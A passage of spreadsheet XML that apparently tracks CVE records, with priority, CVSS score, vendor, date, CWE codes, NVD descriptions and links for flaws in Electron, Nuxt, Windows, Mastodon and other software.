      <c r="K2751" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L2751" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5, apps that expose Promise-returning functions to web content via contextBridge may be vulnerable to a context isolation bypass. Untrusted web content could obtain access to the isolated preload world and, through it, every capability the preload script has. In renderers without a sandbox, or with nodeIntegration enabled, this may escalate to Node.js access. Apps are affected if they expose Promise-returning functions via contextBridge, the standard pattern for wrapping ipcRenderer.invoke, in windows that load untrusted content. This issue is fixed in versions 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M2751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70601</t>
        </is>
      </c>
    </row>
    <row r="2752">
      <c r="A2752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71092</t>
        </is>
      </c>
      <c r="C2752" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2752" s="5" t="inlineStr"/>
      <c r="F2752" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2752" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2752" s="5" t="inlineStr">
        <is>
          <t>oracle:peoplesoft_lease_administration</t>
        </is>
      </c>
      <c r="I2752" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2752" s="5" t="inlineStr"/>
      <c r="K2752" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2752" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in the PeopleSoft Enterprise FIN Lease Administration product of Oracle PeopleSoft (component: Lease Administration).   The supported version that is affected is 9.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where PeopleSoft Enterprise FIN Lease Administration executes to compromise PeopleSoft Enterprise FIN Lease Administration.  While the vulnerability is in PeopleSoft Enterprise FIN Lease Administration, attacks may significantly impact additional products (scope change).  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise FIN Lease Administration accessible data as well as  unauthorized access to critical data or complete access to all PeopleSoft Enterprise FIN Lease Administration accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N).</t>
        </is>
      </c>
      <c r="M2752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71092</t>
        </is>
      </c>
    </row>
    <row r="2753">
      <c r="A2753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71314</t>
        </is>
      </c>
      <c r="C2753" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2753" s="5" t="inlineStr"/>
      <c r="F2753" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2753" s="5" t="inlineStr"/>
      <c r="H2753" s="5" t="inlineStr"/>
      <c r="I2753" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2753" s="5" t="inlineStr"/>
      <c r="K2753" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400, CWE-770, CWE-789</t>
        </is>
      </c>
      <c r="L2753" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.1.0 until 3.21.10 and 4.5.1, an unauthenticated attacker can use a server island v-for prop, including vforToArray and , to trigger unbounded SSR memory allocation until MAX_VFOR_LENGTH = 100000 and crash the Nuxt process. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M2753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71314</t>
        </is>
      </c>
    </row>
    <row r="2754">
      <c r="A2754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71316</t>
        </is>
      </c>
      <c r="C2754" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2754" s="5" t="inlineStr"/>
      <c r="F2754" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2754" s="5" t="inlineStr"/>
      <c r="H2754" s="5" t="inlineStr"/>
      <c r="I2754" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2754" s="5" t="inlineStr"/>
      <c r="K2754" s="5" t="inlineStr">
        <is>
          <t>CWE-524, CWE-862</t>
        </is>
      </c>
      <c r="L2754" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 4.4.0 until 4.5.1, runtime cache:nuxt:payload entries for /&lt;page&gt;/_payload.json can be returned before route middleware and page guards because import.meta.prerender is not enforced, disclosing another user's SSR data. This issue is fixed in 4.5.1.</t>
        </is>
      </c>
      <c r="M2754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71316</t>
        </is>
      </c>
    </row>
    <row r="2755">
      <c r="A2755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71321</t>
        </is>
      </c>
      <c r="C2755" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2755" s="5" t="inlineStr"/>
      <c r="F2755" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2755" s="5" t="inlineStr"/>
      <c r="H2755" s="5" t="inlineStr"/>
      <c r="I2755" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2755" s="5" t="inlineStr"/>
      <c r="K2755" s="5" t="inlineStr">
        <is>
          <t>CWE-407, CWE-770</t>
        </is>
      </c>
      <c r="L2755" s="5" t="inlineStr">
        <is>
          <t>Nuxt is an open-source web development framework for Vue.js. From 3.1.0 until 3.21.10 and 4.5.1, the internal island renderer endpoint `/__nuxt_island/...` decodes and hashes attacker-controlled JSON body input with destr and ohash before validating the URL-resident hash. An unauthenticated `POST /__nuxt_island/_.json` with a large JSON body is fully read, parsed, hashed, and then rejected, which wastes CPU on Nitro single event loop and delays concurrent requests. No valid hash and no authentication are required. This issue is fixed in 3.21.10 and 4.5.1.</t>
        </is>
      </c>
      <c r="M2755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71321</t>
        </is>
      </c>
    </row>
    <row r="2756">
      <c r="A2756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="C2756" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2756" s="5" t="inlineStr"/>
      <c r="F2756" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2756" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2756" s="5" t="inlineStr"/>
      <c r="I2756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2756" s="5" t="inlineStr"/>
      <c r="K2756" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L2756" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="2757">
      <c r="A2757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71360</t>
        </is>
      </c>
      <c r="C2757" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2757" s="5" t="inlineStr"/>
      <c r="F2757" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2757" s="5" t="inlineStr"/>
      <c r="H2757" s="5" t="inlineStr">
        <is>
          <t>adobe:c2pa, adobe:c2patool</t>
        </is>
      </c>
      <c r="I2757" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2757" s="5" t="inlineStr"/>
      <c r="K2757" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2757" s="5" t="inlineStr">
        <is>
          <t>CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="M2757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71360</t>
        </is>
      </c>
    </row>
    <row r="2758">
      <c r="A2758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71488</t>
        </is>
      </c>
      <c r="C2758" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2758" s="5" t="inlineStr"/>
      <c r="F2758" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2758" s="5" t="inlineStr"/>
      <c r="H2758" s="5" t="inlineStr"/>
      <c r="I2758" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2758" s="5" t="inlineStr"/>
      <c r="K2758" s="5" t="inlineStr">
        <is>
          <t>CWE-1050, CWE-407</t>
        </is>
      </c>
      <c r="L2758" s="5" t="inlineStr">
        <is>
          <t>league/commonmark is a PHP library for parsing and rendering CommonMark Markdown. From 0.6.0 until 2.9.0, specially crafted Markdown lines can cause the parser to have quadratic time complexity when converting, because several parsing paths repeatedly rescan growing portions of a line to translate between character positions and byte positions, and the Autolink extension can also copy and validate the remaining line at every URL-like prefix, allowing an attacker who can submit Markdown for conversion to consume disproportionate CPU time with a comparatively small request. This issue is fixed in 2.9.0.</t>
        </is>
      </c>
      <c r="M2758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71488</t>
        </is>
      </c>
    </row>
    <row r="2759">
      <c r="A2759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71626</t>
        </is>
      </c>
      <c r="C2759" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2759" s="5" t="inlineStr"/>
      <c r="F2759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2759" s="5" t="inlineStr"/>
      <c r="H2759" s="5" t="inlineStr"/>
      <c r="I2759" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2759" s="5" t="inlineStr"/>
      <c r="K2759" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2759" s="5" t="inlineStr">
        <is>
          <t>An issue in Invoice Ninja v5.13.24 allows a remote attacker to obtain sensitive information via the StoreWebhookRequest.php, UpdateWebhookRequest.php, and WebhookSingle.php components</t>
        </is>
      </c>
      <c r="M2759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71626</t>
        </is>
      </c>
    </row>
    <row r="2760">
      <c r="A2760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72871</t>
        </is>
      </c>
      <c r="C2760" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2760" s="5" t="inlineStr"/>
      <c r="F2760" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2760" s="5" t="inlineStr"/>
      <c r="H2760" s="5" t="inlineStr"/>
      <c r="I2760" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2760" s="5" t="inlineStr"/>
      <c r="K2760" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2760" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the unauthenticated /api/providers/github/setup route in apps/dokploy/pages/api/providers/github/setup.ts trusts gh_init organizationId and userId values from the state parameter and calls createGithub in packages/server/src/services/github.ts, allowing an attacker to insert a GitHub App provider containing client_secret, webhook_secret, and PEM private key material into another organization. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M2760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72871</t>
        </is>
      </c>
    </row>
    <row r="2761">
      <c r="A2761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72914</t>
        </is>
      </c>
      <c r="C2761" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2761" s="5" t="inlineStr"/>
      <c r="F2761" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2761" s="5" t="inlineStr"/>
      <c r="H2761" s="5" t="inlineStr"/>
      <c r="I2761" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2761" s="5" t="inlineStr"/>
      <c r="K2761" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="L2761" s="5" t="inlineStr">
        <is>
          <t>Mastodon is a free, open-source social network server based on ActivityPub. Prior to 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1, the administrative statistics endpoints handled by Api::V1::Admin::MeasuresController and Api::V1::Admin::RetentionController checked authorization only after beginning expensive calculations. Anonymous callers could submit keys, start_at, and end_at parameters that caused long-running SQL queries in Admin::Metrics::Measure, Admin::Metrics::Retention, and Admin::Metrics::Dimension::BaseDimension, allowing repeated requests to exhaust server resources. This issue is fixed in versions 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1.</t>
        </is>
      </c>
      <c r="M2761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72914</t>
        </is>
      </c>
    </row>
    <row r="2762">
      <c r="A2762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72915</t>
        </is>
      </c>
      <c r="C2762" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2762" s="5" t="inlineStr"/>
      <c r="F2762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2762" s="5" t="inlineStr"/>
      <c r="H2762" s="5" t="inlineStr"/>
      <c r="I2762" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2762" s="5" t="inlineStr"/>
      <c r="K2762" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2762" s="5" t="inlineStr">
        <is>
          <t>Mastodon is a free, open-source social network server based on ActivityPub. From 4.6.0-beta.1 until 4.6.4 and 4.7.0-beta.1, any logged-in local user could use the show action in app/controllers/admin/collections_controller.rb to access personally identifying information about another local user in a collection because the controller used the general collection policy instead of the admin collection policy namespace. The exposed data included the other user's current email address and last-used IP address. This issue is fixed in versions 4.6.4 and 4.7.0-beta.1.</t>
        </is>
      </c>
      <c r="M2762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72915</t>
        </is>
      </c>
    </row>
    <row r="2763">
      <c r="A2763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="C2763" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2763" s="5" t="inlineStr"/>
      <c r="F2763" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2763" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2763" s="5" t="inlineStr"/>
      <c r="I2763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2763" s="5" t="inlineStr"/>
      <c r="K2763" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2763" s="5" t="inlineStr">
        <is>
          <t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t>
        </is>
      </c>
      <c r="M2763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="2764">
      <c r="A2764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="C2764" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2764" s="5" t="inlineStr"/>
      <c r="F2764" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2764" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2764" s="5" t="inlineStr"/>
      <c r="I2764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2764" s="5" t="inlineStr"/>
      <c r="K2764" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2764" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="2765">
      <c r="A2765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="C2765" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2765" s="5" t="inlineStr"/>
      <c r="F2765" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2765" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2765" s="5" t="inlineStr"/>
      <c r="I2765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2765" s="5" t="inlineStr"/>
      <c r="K2765" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2765" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="2766">
      <c r="A2766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="C2766" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2766" s="5" t="inlineStr"/>
      <c r="F2766" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2766" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2766" s="5" t="inlineStr"/>
      <c r="I2766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2766" s="5" t="inlineStr"/>
      <c r="K2766" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2766" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="2767">
      <c r="A2767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="C2767" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2767" s="5" t="inlineStr"/>
      <c r="F2767" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2767" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2767" s="5" t="inlineStr"/>
      <c r="I2767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2767" s="5" t="inlineStr"/>
      <c r="K2767" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2767" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="2768">
      <c r="A2768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="C2768" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2768" s="5" t="inlineStr"/>
      <c r="F2768" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2768" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2768" s="5" t="inlineStr"/>
      <c r="I2768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2768" s="5" t="inlineStr"/>
      <c r="K2768" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2768" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="2769">
      <c r="A2769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="C2769" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2769" s="5" t="inlineStr"/>
      <c r="F2769" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2769" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2769" s="5" t="inlineStr"/>
      <c r="I2769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2769" s="5" t="inlineStr"/>
      <c r="K2769" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L2769" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="2770">
      <c r="A2770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="C2770" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2770" s="5" t="inlineStr"/>
      <c r="F2770" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2770" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H277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2770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2770" s="5" t="inlineStr"/>
      <c r="K2770" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2770" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="2771">
      <c r="A2771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73088</t>
        </is>
      </c>
      <c r="C2771" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2771" s="5" t="inlineStr"/>
      <c r="F2771" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2771" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2771" s="5" t="inlineStr"/>
      <c r="I2771" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2771" s="5" t="inlineStr"/>
      <c r="K2771" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-248</t>
        </is>
      </c>
      <c r="L2771" s="5" t="inlineStr">
        <is>
          <t>Browserslist is a configuration tool for sharing target browsers and Node.js versions between front-end tools. Prior to 4.28.7, normalizeStats() in node.js, reached unconditionally through getStat() and loadStat() on every browserslist() call, processes untrusted browserslist-stats.json, opts.stats, and CLI --stats data with an unguarded for...in loop and plain-object bracket access and assignment, allowing inherited Object.prototype keys including __proto__, toString, valueOf, constructor, hasOwnProperty, and isPrototypeOf to cause an uncaught TypeError or modify the prototype of the returned normalized object. This issue is fixed in version 4.28.7.</t>
        </is>
      </c>
      <c r="M2771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73088</t>
        </is>
      </c>
    </row>
    <row r="2772">
      <c r="A2772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73089</t>
        </is>
      </c>
      <c r="C2772" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2772" s="5" t="inlineStr"/>
